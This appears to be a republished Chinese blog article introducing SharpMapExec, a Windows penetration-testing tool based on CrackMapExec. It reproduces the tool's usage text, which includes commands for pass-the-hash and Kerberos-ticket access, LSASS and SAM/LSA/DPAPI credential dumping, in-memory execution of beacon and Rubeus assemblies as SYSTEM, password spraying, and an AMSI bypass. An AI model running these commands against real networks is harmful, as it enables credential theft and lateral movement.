SharpMapExec是什么

这篇文章主要为大家展示了“SharpMapExec是什么”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“SharpMapExec是什么”这篇文章吧。

SharpMapExec

SharpMapExec是一款针对网络渗透测试高级瑞士Knife,该工具基于CrackMapExec,可以将其理解为是CrackMapExec的优化版本。该工具的目的是简化网络渗透测试的任务操作,并提供一个多功能的渗透测试平台,该工具目前仅支持在Windows操作系统上运行,这也符合内部威胁模拟攻防的常见要求。

除了扫描访问权限外,它还可用于识别存在安全的错误配置以及过滤数据。数据过滤模块的核心实现思想是在远程计算机上执行最少的必要代码,为了完成这个任务,该工具将把所有的敏感数据下载到loot目录并在本地解析它们。

广大研究人员可以指定是否要使用Kerberos或NTLM身份验证,如果选择了Kerberos,那么该工具将创建一个令牌,并使用Rubeus导入或请求凭证。如果指定了NTLM,相应的工具将会创建一个线程并使用SharpKatz运行SetThreadToken(如果指定了NTLM散列)。

工具使用

SharpMapExec.exe

  usage:

 

    --- Smb ---

        SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET

        SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

 

      Available Smb modules

          /m:shares

 

    --- WinRm ---

        SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET

        SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH  /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi>  /computername:TARGET

 

      Available WinRm modules

          /m:exec /a:whoami                           (Invoke-Command)

          /m:exec /a:C:/beacon.exe /system            (Invoke-Command as System)

          /m:comsvcs                                  (Dump Lsass Process)

          /m:secrets                                  (Dump and Parse Sam, Lsa, and System Dpapi blobs)

          /m:assembly /p:Rubeus.exe /a:dump           (Execute Local C# Assembly in memory)

          /m:assembly /p:beacon.exe /system           (Execute Local C# Assembly as System in memory)

          /m:download /path:C:/file /destination:file (Download File from Host)

 

    --- Domain ---

        SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC

        SharpMapExec.exe tgtdeleg

SMB

可以用于扫描管理员访问或可访问的SMB共享。

模块:

/m:shares                                  (Scan enumerated shares for access)

WinRM

该模块内置了AMSI绕过、JEA语言中断和JEA函数分析等功能,可用于代码执行、扫描PsRemote访问、易受攻击的JEA节点和数据过滤。

Domain

当前支持域密码喷射,以及为当前用户创建TGT,该TGT可与/ticket参数一起使用以获取当前上下文。

工具使用样例

该工具支持在内存中执行大量的C#程序:

SharpMapExec是什么

Kerberos密码喷射并扫描本地管理员访问:

SharpMapExec是什么

该项目支持扫描JEA节点,将分析非默认命令的源代码,并检查节点是否未配置为no-language模式:

SharpMapExec是什么

使用一个NT哈希扫描本地管理员密码复用:

SharpMapExec是什么

大批量转储Lsass进程,并将其保存到loot文件夹:

SharpMapExec是什么

在某些使用Kerberos的场景下,可能会要求用户同步DC时钟并设置DNS

net time //DC01.hackit.local /set

Get-NetAdapter ethernet0* | Set-DnsClientServerAddress -ServerAddresses @('192.168.1.10')

以上是“SharpMapExec是什么”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注亿速云行业资讯频道!

原创文章,作者:bd101bd101,如若转载,请注明出处:https://blog.ytso.com/221462.html

(0)
上一篇 2022年1月3日
下一篇 2022年1月3日

相关推荐

发表回复

登录后才能评论